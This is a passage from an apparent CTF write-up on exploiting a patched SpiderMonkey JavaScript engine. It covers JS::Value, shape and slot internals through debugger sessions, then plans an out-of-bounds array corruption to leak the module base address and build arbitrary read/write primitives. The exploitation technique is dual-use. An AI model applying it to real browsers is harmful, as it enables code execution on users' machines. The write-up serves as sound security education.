Now that we know what a JS::Value is, let's have a look at what an Array looks like in memory as this will become useful later. Restart the target and skip the first two breaks:

0:000> .restart /f

0:008> g
Breakpoint 0 hit
js!js::math_atan2:
00007ff69b3fe140 56              push    rsi

0:000> g
Breakpoint 0 hit
js!js::math_atan2:
00007ff69b3fe140 56              push    rsi

0:000> g
Breakpoint 0 hit
js!js::math_atan2:
00007ff69b3fe140 56              push    rsi

0:000> dqs @r8 l@rdx+2
0000027abf5b8198  fffe027abf2a9480
0000027abf5b81a0  fffe027abf280140
0000027abf5b81a8  fffe027abf2900a0

0:000> dqs 27abf2900a0
0000027abf2900a0  0000027abf27ab20
0000027abf2900a8  0000027abf2997e8
0000027abf2900b0  0000000000000000
0000027abf2900b8  0000027abf2900d0
0000027abf2900c0  0000000500000000
0000027abf2900c8  0000000500000006
0000027abf2900d0  fff8800000000001
0000027abf2900d8  fff8800000000002
0000027abf2900e0  fff8800000000003
0000027abf2900e8  fff8800000000004
0000027abf2900f0  fff8800000000005
0000027abf2900f8  4f4f4f4f4f4f4f4f


At this point we recognize the content of the array: it contains five integers encoded as JS::Value from 1 to 5. We can also kind of see what could potentially be a size and a capacity but it is hard to guess the rest.

0:000> dt JSObject
+0x000 group_           : js::GCPtr<js::ObjectGroup *>
+0x008 shapeOrExpando_  : Ptr64 Void

0:000> dt js::NativeObject
+0x000 group_           : js::GCPtr<js::ObjectGroup *>
+0x008 shapeOrExpando_  : Ptr64 Void
+0x010 slots_           : Ptr64 js::HeapSlot
+0x018 elements_        : Ptr64 js::HeapSlot

0:000> dt js::ArrayObject
+0x000 group_           : js::GCPtr<js::ObjectGroup *>
+0x008 shapeOrExpando_  : Ptr64 Void
+0x010 slots_           : Ptr64 js::HeapSlot
+0x018 elements_        : Ptr64 js::HeapSlot


The JS::ArrayObject is defined in the vm/ArrayObject.h file and it subclasses the JS::NativeObject class (JS::NativeObject subclasses JS::ShapedObject which naturally subclasses JSObject). Note that it is also subclassed by basically every other JavaScript object, as you can see in the diagram below:

A native object in SpiderMonkey is basically made of two components:

1. a shape object which is used to describe the properties and the class of the said object, more on that just a bit below (pointed to by the field shapeOrExpando_).
2. storage to store elements or the value of properties.

Let's switch gears and have a look at how object properties are stored in memory.

Shapes

As mentioned above, the role of a shape object is to describe the various properties that an object has. You can, conceptually, think of it as some sort of hash table where the keys are the property names and the values are the slot number of where the property content is actually stored.

Before reading further though, I recommend that you watch a very short presentation made by @bmeurer and @mathias describing how properties are stored in JavaScript engines: JavaScript engine fundamentals: Shapes and Inline Caches. As they did a very good job of explaining things clearly, it should help clear up what comes next and it also means I don't have to introduce things as much.

Consider the below JavaScript code:

'use strict';

const Address = Math.atan2;

const A = {
    foo : 1337,
    blah : 'doar-e'
};
Address(A);

const B = {
    foo : 1338,
    blah : 'sup'
};
Address(B);

const C = {
    foo : 1338,
    blah : 'sup'
};
C.another = true;
Address(C);


Throw it in the shell under your favorite debugger to have a closer look at this shape object:

0:000> bp js!js::math_atan2

0:000> g
Breakpoint 0 hit
Time Travel Position: D454:D
js!js::math_atan2:
00007ff776c9e140 56              push    rsi

0:000> ?? vp[2].asBits_
unsigned int64 0xfffe01fce637e1c0

0:000> dt js::NativeObject 1fce637e1c0 shapeOrExpando_
+0x008 shapeOrExpando_ : 0x000001fce63ae880 Void

0:000> ?? ((js::shape*)0x000001fce63ae880)
class js::Shape * 0x000001fce63ae880
+0x000 base_            : js::GCPtr<js::BaseShape *>
+0x008 propid_          : js::PreBarriered<jsid>
+0x010 immutableFlags   : 0x2000001
+0x014 attrs            : 0x1 ''
+0x015 mutableFlags     : 0 ''
+0x018 parent           : js::GCPtr<js::Shape *>
+0x020 kids             : js::KidsPointer
+0x020 listp            : (null)

0:000> ?? ((js::shape*)0x000001fce63ae880)->propid_.value
struct jsid
+0x000 asBits           : 0x000001fce63a7e20


In the implementation, a JS::Shape describes a single property; its name and slot number. To describe several of them, shapes are linked together via the parent field (and others). The slot number (which is used to find the property content later) is stored in the lower bits of the immutableFlags field. The property name is stored as a jsid in the propid_ field.

I understand this is a lot of abstract information thrown at your face right now. But let's peel the onion to clear things up, starting with a closer look at the above shape. This JS::Shape object describes a property whose value is stored in slot number 1 (0x2000001 & SLOT_MASK). To get its name we dump its propid_ field which is 0x000001fce63a7e20.

What is a jsid? A jsid is another type of tagged pointer where type information is encoded in the lower three bits this time.

Thanks to those lower bits we know that this address is pointing to a string and it should match one of our property names :).

0:000> ?? (char*)((JSString*)0x000001fce63a7e20)->d.inlineStorageLatin1
char * 0x000001fce63a7e28
"blah"


Good. As we mentioned above, shape objects are linked together. If we dump its parent we expect to find the shape that describes our other property, foo:

0:000> ?? ((js::shape*)0x000001fce63ae880)->parent.value
class js::Shape * 0x000001fce63ae858
+0x000 base_            : js::GCPtr<js::BaseShape *>
+0x008 propid_          : js::PreBarriered<jsid>
+0x010 immutableFlags   : 0x2000000
+0x014 attrs            : 0x1 ''
+0x015 mutableFlags     : 0x2 ''
+0x018 parent           : js::GCPtr<js::Shape *>
+0x020 kids             : js::KidsPointer
+0x020 listp            : 0x000001fce63ae880 js::GCPtr<js::Shape *>

0:000> ?? ((js::shape*)0x000001fce63ae880)->parent.value->propid_.value
struct jsid
+0x000 asBits           : 0x000001fce633d700

0:000> ?? (char*)((JSString*)0x000001fce633d700)->d.inlineStorageLatin1
char * 0x000001fce633d708
"foo"
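The two bits of decoding we just did by eye (slot number out of immutableFlags, type out of the jsid) can be sketched as below. Heads-up: the concrete values of SLOT_MASK (low 24 bits) and of the jsid type constants are assumptions on my side and not something shown in this post, so double-check them against vm/Shape.h and the jsid definitions in your tree. slotOf and jsidIsString are made-up helper names.

```javascript
// Assumed constants (not taken from this post, verify them in your tree):
// - SLOT_MASK keeps the low 24 bits of Shape::immutableFlags,
// - a jsid whose low three bits are zero is a string.
const SLOT_MASK = (1 << 24) - 1;
const JSID_TYPE_MASK = 0x7n;
const JSID_TYPE_STRING = 0x0n;

// Hypothetical helper: slot index described by a shape.
function slotOf(immutableFlags) {
  return immutableFlags & SLOT_MASK;
}

// Hypothetical helper: does this jsid point to a string?
function jsidIsString(bits) {
  return (bits & JSID_TYPE_MASK) === JSID_TYPE_STRING;
}

console.log(slotOf(0x2000001));                 // shape describing blah
console.log(slotOf(0x2000000));                 // shape describing foo
console.log(jsidIsString(0x000001fce63a7e20n)); // propid_ of blah
console.log(jsidIsString(0x000001fce633d700n)); // propid_ of foo
```

Under those assumptions, the results line up with what the debugger showed: blah lives in slot 1, foo in slot 0, and both jsids are strings.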


Press g to continue the execution and check if the second object shares the same shape hierarchy (0x000001fce63ae880):

0:000> g
Breakpoint 0 hit
Time Travel Position: D484:D
js!js::math_atan2:
00007ff776c9e140 56              push    rsi

0:000> ?? vp[2].asBits_
unsigned int64 0xfffe01fce637e1f0

0:000> dt js::NativeObject 1fce637e1f0 shapeOrExpando_
+0x008 shapeOrExpando_ : 0x000001fce63ae880 Void


As expected B indeed shares it even though A and B store different property values. Care to guess what is going to happen when we add another property to C now? To find out, press g one last time:

0:000> g
Breakpoint 0 hit
Time Travel Position: D493:D
js!js::math_atan2:
00007ff776c9e140 56              push    rsi

0:000> ?? vp[2].asBits_
union JS::Value
+0x000 asBits_          : 0xfffe01e7c247e1c0

0:000> dt js::NativeObject 1fce637e1f0 shapeOrExpando_
+0x008 shapeOrExpando_ : 0x000001fce63b10d8 Void

0:000> ?? ((js::shape*)0x000001fce63b10d8)
class js::Shape * 0x000001fce63b10d8
+0x000 base_            : js::GCPtr<js::BaseShape *>
+0x008 propid_          : js::PreBarriered<jsid>
+0x010 immutableFlags   : 0x2000002
+0x014 attrs            : 0x1 ''
+0x015 mutableFlags     : 0 ''
+0x018 parent           : js::GCPtr<js::Shape *>
+0x020 kids             : js::KidsPointer
+0x020 listp            : (null)

0:000> ?? ((js::shape*)0x000001fce63b10d8)->propid_.value
struct jsid
+0x000 asBits           : 0x000001fce63a7e60

0:000> ?? (char*)((JSString*)0x000001fce63a7e60)->d.inlineStorageLatin1
char * 0x000001fce63a7e68
"another"

0:000> ?? ((js::shape*)0x000001fce63b10d8)->parent.value
class js::Shape * 0x000001fce63ae880


A new JS::Shape gets allocated (0x000001fce63b10d8) and its parent is the previous set of shapes (0x000001fce63ae880). A bit like prepending a node in a linked-list.
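If the debugger output is a bit dry, here is a toy model of what we just observed. To be clear, this is not how SpiderMonkey implements shapes: the Shape class, addProperty, lookup and makeObject below are all names I made up, and the model only keeps the three ideas we care about (one shape per property, a parent link, a slot number).

```javascript
// Toy model of a shape lineage, for illustration only.
class Shape {
  constructor(parent, propName, slot) {
    this.parent = parent;     // previous shape in the lineage (null for the root)
    this.propName = propName; // the single property this shape describes
    this.slot = slot;         // slot index where the property value is stored
    this.kids = new Map();    // transitions to child shapes, keyed by name
  }

  // Return the shape reached by adding propName; it is created only once,
  // which is why objects built the same way end up sharing shapes.
  addProperty(propName) {
    let kid = this.kids.get(propName);
    if (kid === undefined) {
      kid = new Shape(this, propName, this.slot + 1);
      this.kids.set(propName, kid);
    }
    return kid;
  }

  // Walk the parent links to find the slot of a property (-1 if missing).
  lookup(propName) {
    for (let s = this; s !== null; s = s.parent) {
      if (s.propName === propName) return s.slot;
    }
    return -1;
  }
}

const EMPTY_SHAPE = new Shape(null, null, -1);

function makeObject(props) {
  let shape = EMPTY_SHAPE;
  const slots = [];
  for (const [name, value] of Object.entries(props)) {
    shape = shape.addProperty(name);
    slots[shape.slot] = value;
  }
  return { shape, slots };
}

const A = makeObject({ foo: 1337, blah: 'doar-e' });
const B = makeObject({ foo: 1338, blah: 'sup' });
const C = makeObject({ foo: 1338, blah: 'sup' });
C.shape = C.shape.addProperty('another');
C.slots[C.shape.slot] = true;

console.log(A.shape === B.shape);             // same shape, different values
console.log(C.shape.parent === A.shape);      // the new shape chains to the old one
console.log(A.slots[A.shape.lookup('blah')]); // value found through the shape
```

The last three lines mirror the three observations from the trace: A and B share a shape, C gets a fresh one whose parent is the shared shape, and a value is found by going from the shape to a slot number.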

Slots

In the previous section, we talked a lot about how property names are stored in memory. Now where are property values?

To answer this question we load the TTD trace we acquired earlier into our debugger and go back to the first call to Math.atan2:

Breakpoint 0 hit
Time Travel Position: D454:D
js!js::math_atan2:
00007ff776c9e140 56              push    rsi

0:000> ?? vp[2].asBits_
unsigned int64 0xfffe01fce637e1c0


Because we went through the process of dumping the js::Shape objects describing the foo and the blah properties already, we know that their property values are respectively stored in slot zero and slot one. To look at those, we just dump the memory right after the js::NativeObject:

0:000> ?? vp[2].asBits_
unsigned int64 0xfffe01fce637e1c0
0:000> dt js::NativeObject 1fce637e1c0
+0x000 group_           : js::GCPtr<js::ObjectGroup *>
+0x008 shapeOrExpando_  : 0x000001fce63ae880 Void
+0x010 slots_           : (null)
+0x018 elements_        : 0x00007ff77707dac0 js::HeapSlot

0:000> dqs 1fce637e1c0
000001fce637e1c0  000001fce637a520
000001fce637e1c8  000001fce63ae880
000001fce637e1d0  0000000000000000
000001fce637e1d8  00007ff77707dac0 js!emptyElementsHeader+0x10
000001fce637e1e0  fff8800000000539 <- foo
000001fce637e1e8  fffb01fce63a7e40 <- blah


Naturally, the second property is another js::Value pointing to a JSString and we can dump it as well:

0:000> ?? (char*)((JSString*)0x1fce63a7e40)->d.inlineStorageLatin1
char * 0x000001fce63a7e48
"doar-e"
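Put differently, for this object a property read boils down to "take the slot number from the shape, and index the memory right after the four js::NativeObject fields". A small sketch of that arithmetic, using the addresses from the dump above (fixedSlotAddress is a hypothetical helper; it only covers values stored inline after the object, which is what we see here with slots_ being null, and I am assuming values that do not fit inline are reached through slots_ instead):

```javascript
// js::NativeObject has four 8-byte fields (group_, shapeOrExpando_, slots_,
// elements_), so the inline slots start 0x20 bytes after the object address.
const NATIVE_OBJECT_SIZE = 0x20n;
const SLOT_SIZE = 8n; // each slot is a 64-bit JS::Value

// Hypothetical helper: address of the Nth inline slot of an object.
function fixedSlotAddress(objectAddress, slot) {
  return objectAddress + NATIVE_OBJECT_SIZE + BigInt(slot) * SLOT_SIZE;
}

const A = 0x1fce637e1c0n; // payload of vp[2] in the trace
console.log(fixedSlotAddress(A, 0).toString(16)); // where foo is stored
console.log(fixedSlotAddress(A, 1).toString(16)); // where blah is stored
```

The two addresses should match the lines annotated with foo and blah in the dqs output.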


Here is a diagram describing the hierarchy of objects to clear any potential confusion:

This is really as much internals as I wanted to cover as it should be enough to understand what follows. You should also be able to inspect most JavaScript objects with this background. The only sort-of odd-balls I have encountered are JavaScript Arrays, which store the length property, for example, in a js::ObjectElements object; but that is about it.

0:000> dt js::ObjectElements
+0x000 flags            : Uint4B
+0x004 initializedLength : Uint4B
+0x008 capacity         : Uint4B
+0x00c length           : Uint4B
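With this layout in hand we can go back to the array dumped earlier: its elements_ pointer was 0x27abf2900d0, and the two quad-words right before it (at 0x27abf2900c0) are the js::ObjectElements header. A small sketch to decode them (decodeElementsHeader is a made-up helper, and it assumes a little-endian target, which is the case on x64):

```javascript
// Decode the 16-byte js::ObjectElements header from two little-endian
// quad-words, following the field offsets printed by dt above.
function decodeElementsHeader(qword0, qword1) {
  const low = (q) => Number(q & 0xffffffffn); // dword at the lower address
  const high = (q) => Number(q >> 32n);       // dword at the higher address
  return {
    flags: low(qword0),              // +0x000
    initializedLength: high(qword0), // +0x004
    capacity: low(qword1),           // +0x008
    length: high(qword1),            // +0x00c
  };
}

// Quad-words found at 0x27abf2900c0 and 0x27abf2900c8 in the Array dump.
const header = decodeElementsHeader(0x0000000500000000n, 0x0000000500000006n);
console.log(header);
```

This gives a length and an initialized length of 5 and a capacity of 6, which is consistent with the five-element array we passed to Address.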


Exploits

Now that we all are SpiderMonkey experts, let's have a look at the actual challenge. Note that clearly we did not need the above context to just write a simple exploit. The thing is, just writing an exploit was never my goal.

The vulnerability

After taking a closer look at the blaze.patch diff it becomes pretty clear that the author has added a method to Array objects called blaze. This new method sets the array's internal length, capacity and initialized length to 420, because it was Blaze CTF after all :). This allows us to access memory out-of-bounds, past the end of the backing buffer.

js> blz = []
[]

js> blz.length
0

js> blz.blaze() == undefined
false

js> blz.length
420


One little quirk to keep in mind when using the debug build of js.exe is that you need to ensure that the blaze'd object is never displayed by the interpreter. If it is, the toString() function of the array iterates through every item and invokes its toString(). This basically blows up once you start reading out-of-bounds, and will most likely run into the crash below:

js> blz.blaze()
Assertion failure: (ptrBits & 0x7) == 0, at c:\Users\over\mozilla-central\js\src\build-release.x64\dist\include\js/Value.h:809

(1d7c.2b3c): Break instruction exception - code 80000003 (!!! second chance !!!)
*** WARNING: Unable to verify checksum for c:\work\codes\blazefox\js-asserts\js.exe
js!JS::Value::toGCThing+0x75 [inlined in js!JS::MutableHandle<JS::Value>::set+0x97]:
00007ff6ac86d7d7 cc              int     3


An easy work-around for this annoyance is to either provide a file directly to the JavaScript shell or to use an expression that does not return the resulting array, like blz.blaze() == undefined. Note that, naturally, you will not encounter the above assertion in the release build.

basic.js

As introduced above, our goal with this exploit is to pop calc. We don't care about how unreliable or crappy the exploit is: we just want to get native code execution inside the JavaScript shell. For this exploit, I have exploited a debug build of the shell where asserts are enabled. I encourage you to follow along, and for that I have shared the binaries (along with symbol information) here: js-asserts.

With an out-of-bounds like this one what we want is to have two adjacent arrays and use the first one to corrupt the second one. With this set-up, we can convert a limited relative memory read / write access primitive to an arbitrary read / write primitive.

Now, we have to keep in mind that Arrays store js::Values and not raw values. If you were to out-of-bounds write the value 0x1337 in JavaScript, you would actually write the value 0xfff8800000001337 in memory. It felt a bit weird at the beginning, but as usual you get used to this type of thing pretty quickly :-).
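
If you want to convince yourself of that encoding, here is a small sketch of the boxing step. It uses BigInt, which is a modern convenience and not what the exploit itself relies on. The integer tag value is inferred from the 0xfff88... prefix visible in the dumps of this article; the constant and function names are mine.

```javascript
// Sketch of how a 32-bit integer is boxed into a 64-bit js::Value.
// The tag value is inferred from the dumps in this article; the names
// below are illustrative and not taken from the SpiderMonkey sources.
const TAG_SHIFT = 47n;
const TAG_INT32 = 0x1fff1n; // gives the 0xfff88... prefix seen on integers

function boxInt32(value) {
    // `>>> 0` reinterprets the number as an unsigned 32-bit payload.
    return (TAG_INT32 << TAG_SHIFT) | BigInt(value >>> 0);
}

function hex(bits) {
    return '0x' + bits.toString(16).padStart(16, '0');
}

console.log(hex(boxInt32(0x1337))); // 0xfff8800000001337
console.log(hex(boxInt32(1337)));   // 0xfff8800000000539
```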

Anyway moving on: time to have a closer look at Arrays. For that, I highly recommend grabbing an execution trace of a simple JavaScript file creating arrays with TTD. Once traced, you can load it in the debugger in order to figure out how Arrays are allocated and where.

Note that to inspect JavaScript objects from the debugger I use a JavaScript extension I wrote called sm.js that you can find here.

0:000> bp js!js::math_atan2

0:000> g
Breakpoint 0 hit
Time Travel Position: D5DC:D
js!js::math_atan2:
00007ff74704e140 56              push    rsi

0:000> !smdump_jsvalue vp[2].asBits_
25849101b00: js!js::ArrayObject:   Length: 4
25849101b00: js!js::ArrayObject: Capacity: 6
25849101b00: js!js::ArrayObject:  Content: [0x1, 0x2, 0x3, 0x4]
@$smdump_jsvalue(vp[2].asBits_)

0:000> dx -g @$cursession.TTD.Calls("js!js::allocate<JSObject,js::NoGC>").Where(p => p.ReturnValue == 0x25849101b00)
=====================================================================================================================================================================================================================
=           = (+) EventType = (+) ThreadId = (+) UniqueThreadId = (+) TimeStart = (+) TimeEnd = (+) Function                          = (+) FunctionAddress = (+) ReturnAddress = (+) ReturnValue  = (+) Parameters =
=====================================================================================================================================================================================================================
= [0x14]    - Call          - 0x32f8       - 0x2                - D58F:723      - D58F:77C    - js!js::Allocate<JSObject,js::NoGC>    - 0x7ff746f841b0      - 0x7ff746b4b702    - 0x25849101b00    - {...}          =
=====================================================================================================================================================================================================================

0:000> !tt D58F:723
Setting position: D58F:723
Time Travel Position: D58F:723
js!js::Allocate<JSObject,js::NoGC>:
00007ff746f841b0 4883ec28        sub     rsp,28h

0:000> kc
# Call Site
00 js!js::Allocate<JSObject,js::NoGC>
01 js!js::NewObjectCache::newObjectFromHit
02 js!NewArrayTryUseGroup<4294967295>
03 js!js::NewCopiedArrayForCallingAllocationSite
04 js!ArrayConstructorImpl
05 js!js::ArrayConstructor
06 js!InternalConstruct
07 js!Interpret
08 js!js::RunScript
09 js!js::ExecuteKernel
0a js!js::Execute
0b js!JS_ExecuteScript
0c js!Process
0d js!main
0e js!__scrt_common_main_seh

0:000> dv
kind = OBJECT8_BACKGROUND (0n9)
nDynamicSlots = 0
heap = DefaultHeap (0n0)


Cool. According to the above, new Array(1, 2, 3, 4) is allocated from the Nursery heap (or DefaultHeap) and is an OBJECT8_BACKGROUND. Objects of this kind are 0x60 bytes long as you can see below:

0:000> x js!js::gc::Arena::ThingSizes
00007ff7474415b0 js!js::gc::Arena::ThingSizes = <no type information>

0:000> dds 00007ff7474415b0 + 9*4 l1
00007ff7474415d4  00000060


The Nursery heap is 16MB at most (by default, but can be tweaked with the --nursery-size option). One thing nice for us about this allocator is that there is no randomization whatsoever. If we allocate two arrays, there is a high chance that they are adjacent in memory. The other awesome thing is that TypedArrays are allocated there too.

As a first experiment we can try to have an Array and a TypedArray adjacent in memory and confirm things in a debugger. The script I used is pretty dumb as you can see:

const Smalls = new Array(1, 2, 3, 4);
const U8A = new Uint8Array(8);


Let's have a look at it from the debugger now:

(2ab8.22d4): Break instruction exception - code 80000003 (first chance)
ntdll!DbgBreakPoint:
00007fffb8c33050 cc              int     3
0:005> bp js!js::math_atan2

0:005> g
Breakpoint 0 hit
js!js::math_atan2:
00007ff74704e140 56              push    rsi

0:000> ?? vp[2].asBits_
unsigned int64 0xfffe013ebb2019e0

JavaScript script successfully loaded from 'c:\work\codes\blazefox\sm\sm.js'

0:000> !smdump_jsvalue vp[2].asBits_
13ebb2019e0: js!js::ArrayObject:   Length: 4
13ebb2019e0: js!js::ArrayObject: Capacity: 6
13ebb2019e0: js!js::ArrayObject:  Content: [0x1, 0x2, 0x3, 0x4]
@$smdump_jsvalue(vp[2].asBits_)

0:000> ? 0xfffe013ebb2019e0 + 60
Evaluate expression: -561581014377920 = fffe013ebb201a40

0:000> !smdump_jsvalue 0xfffe013ebb201a40
13ebb201a40: js!js::TypedArrayObject:       Type: Uint8Array
13ebb201a40: js!js::TypedArrayObject:     Length: 8
13ebb201a40: js!js::TypedArrayObject: ByteLength: 8
13ebb201a40: js!js::TypedArrayObject: ByteOffset: 0
13ebb201a40: js!js::TypedArrayObject:    Content: Uint8Array({Length:8, ...})
@$smdump_jsvalue(0xfffe013ebb201a40)


Cool, story checks out: the Array (whose size is 0x60 bytes) is adjacent to the TypedArray. It might be a good occasion for me to tell you that between the time I compiled the debug build of the JavaScript shell and the time I compiled the release version, some core structures changed slightly, which means that if you use sm.js on the debug one it will not work :). Here is an example of such a change:

0:008> dt js::Shape
+0x000 base_            : js::GCPtr<js::BaseShape *>
+0x008 propid_          : js::PreBarriered<jsid>
+0x010 slotInfo         : Uint4B
+0x014 attrs            : UChar
+0x015 flags            : UChar
+0x018 parent           : js::GCPtr<js::Shape *>
+0x020 kids             : js::KidsPointer
+0x020 listp            : Ptr64 js::GCPtr<js::Shape *>

VS

0:000> dt js::Shape
+0x000 base_            : js::GCPtr<js::BaseShape *>
+0x008 propid_          : js::PreBarriered<jsid>
+0x010 immutableFlags   : Uint4B
+0x014 attrs            : UChar
+0x015 mutableFlags     : UChar
+0x018 parent           : js::GCPtr<js::Shape *>
+0x020 kids             : js::KidsPointer
+0x020 listp            : Ptr64 js::GCPtr<js::Shape *>


As we want to corrupt the adjacent TypedArray we should probably have a look at its layout. We are interested in corrupting such an object to be able to fully control the memory. Not writing controlled js::Value anymore but actual raw bytes will be pretty useful to us. For those who are not familiar with TypedArray, they are JavaScript objects that allow you to access raw binary data like you would with C arrays. For example, Uint32Array gives you a mechanism for accessing raw uint32_t data, Uint8Array for uint8_t data, etc.

By looking at the source-code, we learn that TypedArrays are js::TypedArrayObject which subclasses js::ArrayBufferViewObject. What we want to know is basically in which slot the buffer size and the buffer pointer are stored (so that we can corrupt them):

class ArrayBufferViewObject : public NativeObject
{
public:
// Underlying (Shared)ArrayBufferObject.
static constexpr size_t BUFFER_SLOT = 0;
// Slot containing length of the view in number of typed elements.
static constexpr size_t LENGTH_SLOT = 1;
// Offset of view within underlying (Shared)ArrayBufferObject.
static constexpr size_t BYTEOFFSET_SLOT = 2;
static constexpr size_t DATA_SLOT = 3;
// [...]
};

class TypedArrayObject : public ArrayBufferViewObject


Great. This is what it looks like in the debugger:

0:000> ?? vp[2]
union JS::Value
+0x000 asBits_          : 0xfffe02163cb019e0
+0x000 asDouble_        : -1.#QNAN
+0x000 s_               : JS::Value::<unnamed-type-s_>

0:000> dt js::NativeObject 2163cb019e0
+0x000 group_           : js::GCPtr<js::ObjectGroup *>
+0x008 shapeOrExpando_  : 0x000002163ccac948 Void
+0x010 slots_           : (null)
+0x018 elements_        : 0x00007ff7f7ecdac0 js::HeapSlot

0:000> dqs 2163cb019e0
000002163cb019e0  000002163cc7ac70
000002163cb019e8  000002163ccac948
000002163cb019f0  0000000000000000
000002163cb019f8  00007ff7f7ecdac0 js!emptyElementsHeader+0x10
000002163cb01a00  fffa000000000000 <- BUFFER_SLOT
000002163cb01a08  fff8800000000008 <- LENGTH_SLOT
000002163cb01a10  fff8800000000000 <- BYTEOFFSET_SLOT
000002163cb01a18  000002163cb01a20 <- DATA_SLOT
000002163cb01a20  0000000000000000 <- Inline data (8 bytes)


As you can see, the length is a js::Value and the pointer to the inline buffer of the array is a raw pointer. What is also convenient is that the elements_ field points into the .rdata section of the JavaScript engine binary (js.exe when using the JavaScript Shell, and xul.dll when using Firefox). We use it to leak the base address of the module.

With this in mind we can start to create exploitation primitives:

1. We can leak the base address of js.exe by reading the elements_ field of the TypedArray,
2. We can create absolute memory access primitives by corrupting the DATA_SLOT and then reading / writing through the TypedArray (can also corrupt the LENGTH_SLOT if needed).

Now, you might be wondering how we are going to be able to read a raw pointer through the Array that stores js::Value? What do you think happens if we read a user-mode pointer as a js::Value?

To answer this question, I think it is a good time to sit down and have a look at IEEE754 and the way doubles are encoded in js::Value to hopefully find out if the above operation is safe or not. The largest js::Value recognized as a double is 0x1fff0 << 47 = 0xfff8000000000000. And everything smaller is considered as a double as well. 0x1fff0 is the JSVAL_TAG_MAX_DOUBLE tag. Naively, you could think that you can encode pointers from 0x0000000000000000 to 0xfff8000000000000 as a js::Value double. The way doubles are encoded according to IEEE754 is that you have 52 bits of fraction, 11 bits of exponent and 1 bit of sign. The standard also defines a bunch of special values such as: NaN or Infinity. Let's walk through each of them one by one.

NaN is represented through several bit patterns that follow the same rules: they all have an exponent with every bit set to 1, and the fraction can be anything except all 0 bits. Taking both signs into account, this gives us the following NaN ranges: [0x7ff0000000000001, 0x7fffffffffffffff] and [0xfff0000000000001, 0xffffffffffffffff]. See the below for details:

• 0x7ff0000000000001 is the smallest NaN with sign=0, exp='1'*11, frac='0'*51+'1':
• 0b0111111111110000000000000000000000000000000000000000000000000001
• 0xffffffffffffffff is the biggest NaN with sign=1, exp='1'*11, frac='1'*52:
• 0b1111111111111111111111111111111111111111111111111111111111111111

There are two Infinity values for the positive and the negative ones: 0x7ff0000000000000 and 0xfff0000000000000. See the below for details:

• 0x7ff0000000000000 is +Infinity with sign=0, exp='1'*11, frac='0'*52:
• 0b0111111111110000000000000000000000000000000000000000000000000000
• 0xfff0000000000000 is -Infinity with sign=1, exp='1'*11, frac='0'*52:
• 0b1111111111110000000000000000000000000000000000000000000000000000

There are also two Zero values, a positive and a negative one, whose values are 0x0000000000000000 and 0x8000000000000000. See the below for details:

• 0x0000000000000000 is +0 with sign=0, exp='0'*11, frac='0'*52:
• 0b0000000000000000000000000000000000000000000000000000000000000000
• 0x8000000000000000 is -0 with sign=1, exp='0'*11, frac='0'*52:
• 0b1000000000000000000000000000000000000000000000000000000000000000

Basically NaN values are the annoying ones because if we leak a raw pointer through a js::Value and it happens to be a NaN bit pattern, we are not able to tell which one it originally was. The rest of the special values are fine as there is a 1:1 matching between the encoding and their meanings. In a 64-bit process on Windows, the user-mode part of the virtual address space is 128TB: from 0x0000000000000000 to 0x00007fffffffffff. The good news is that there is no intersection between the NaN bit patterns and all the possible values of a user-mode pointer, which means we can safely leak them via a js::Value :).

If you would like to play with the above a bit more, you can use the below functions in the JavaScript Shell:

function b2f(A) {
    if(A.length != 8) {
        throw 'Needs to be an 8 bytes long array';
    }

    const Bytes = new Uint8Array(A);
    const Doubles = new Float64Array(Bytes.buffer);
    return Doubles[0];
}

function f2b(A) {
    const Doubles = new Float64Array(1);
    Doubles[0] = A;
    return Array.from(new Uint8Array(Doubles.buffer));
}


And see things for yourselves:

// +Infinity
js> f2b(b2f([0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xf0, 0x7f]))
[0, 0, 0, 0, 0, 0, 240, 127]

// -Infinity
js> f2b(b2f([0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xf0, 0xff]))
[0, 0, 0, 0, 0, 0, 240, 255]

// NaN smallest
js> f2b(b2f([0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0xf0, 0x7f]))
[0, 0, 0, 0, 0, 0, 248, 127]

// NaN biggest
js> f2b(b2f([0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff]))
[0, 0, 0, 0, 0, 0, 248, 127]
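
The same experiment can be done on raw 64-bit patterns instead of byte arrays. The sketch below assumes a shell with BigInt and BigUint64Array support (Node works too); the helper names are illustrative and are not part of Int64.js. It checks that the highest user-mode address is not a NaN pattern and that a pointer survives a round trip through a double.

```javascript
// Reinterpret a 64-bit pattern as a double and back, using BigInt.
// Helper names are illustrative; they are not part of Int64.js.
const scratch = new ArrayBuffer(8);
const asU64 = new BigUint64Array(scratch);
const asF64 = new Float64Array(scratch);

function bitsToDouble(bits) {
    asU64[0] = bits;
    return asF64[0];
}

function doubleToBits(value) {
    asF64[0] = value;
    return asU64[0];
}

// NaN: exponent is all ones and the fraction is non-zero.
function isNaNBits(bits) {
    const exponent = (bits >> 52n) & 0x7ffn;
    const fraction = bits & ((1n << 52n) - 1n);
    return exponent === 0x7ffn && fraction !== 0n;
}

// Highest user-mode address on 64-bit Windows, per the text above.
const maxUserPointer = 0x00007fffffffffffn;
console.log(isNaNBits(maxUserPointer)); // false

// A pointer taken from the debugger output of this article.
const leaked = 0x00007ff7f7ecdac0n;
console.log(doubleToBits(bitsToDouble(leaked)) === leaked); // true
```

User-mode pointers have their top 17 bits clear, so their exponent can never be all ones: they decode as tiny (denormal or very small) positive doubles.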


Anyway, this means we can leak the emptyElementsHeader pointer as well as corrupt the DATA_SLOT buffer pointer with doubles. Because I did not realize how doubles were encoded in js::Value at first (duh), I actually had another Array adjacent to the TypedArray (one Array, one TypedArray and one Array) so that I could read the pointer via the TypedArray :(.

Last thing to mention before coding a bit is that we use the Int64.js library written by saelo in order to represent 64-bit integers (that we cannot represent today with JavaScript native integers) and have utility functions to convert a double to an Int64 or vice-versa. This is not something that we have to use, but it makes things feel more natural. At the time of writing, the BigInt (aka arbitrary precision JavaScript integers) JavaScript standard wasn't enabled by default on Firefox, but this should be pretty mainstream in every major browser quite soon. It will make all those shenanigans easier and you will not need any custom JavaScript module anymore to exploit your browser, quite the luxury :-).

Below is a summary diagram of the blaze'd Array and the TypedArray that we can corrupt via the first one:

Building an arbitrary memory access primitive

As per the above illustration, the first Array is 0x60 bytes long (including the inline buffer, assuming we instantiate it with at most 6 entries). The inline backing buffer starts at +0x30 (6*8). The backing buffer can hold 6 js::Value (another 0x30 bytes), and the target pointer to leak is at +0x18 (3*8) of the TypedArray. This means that if we get the (6+3)th entry of the Array, we should have in return the js!emptyElementsHeader pointer encoded as a double:

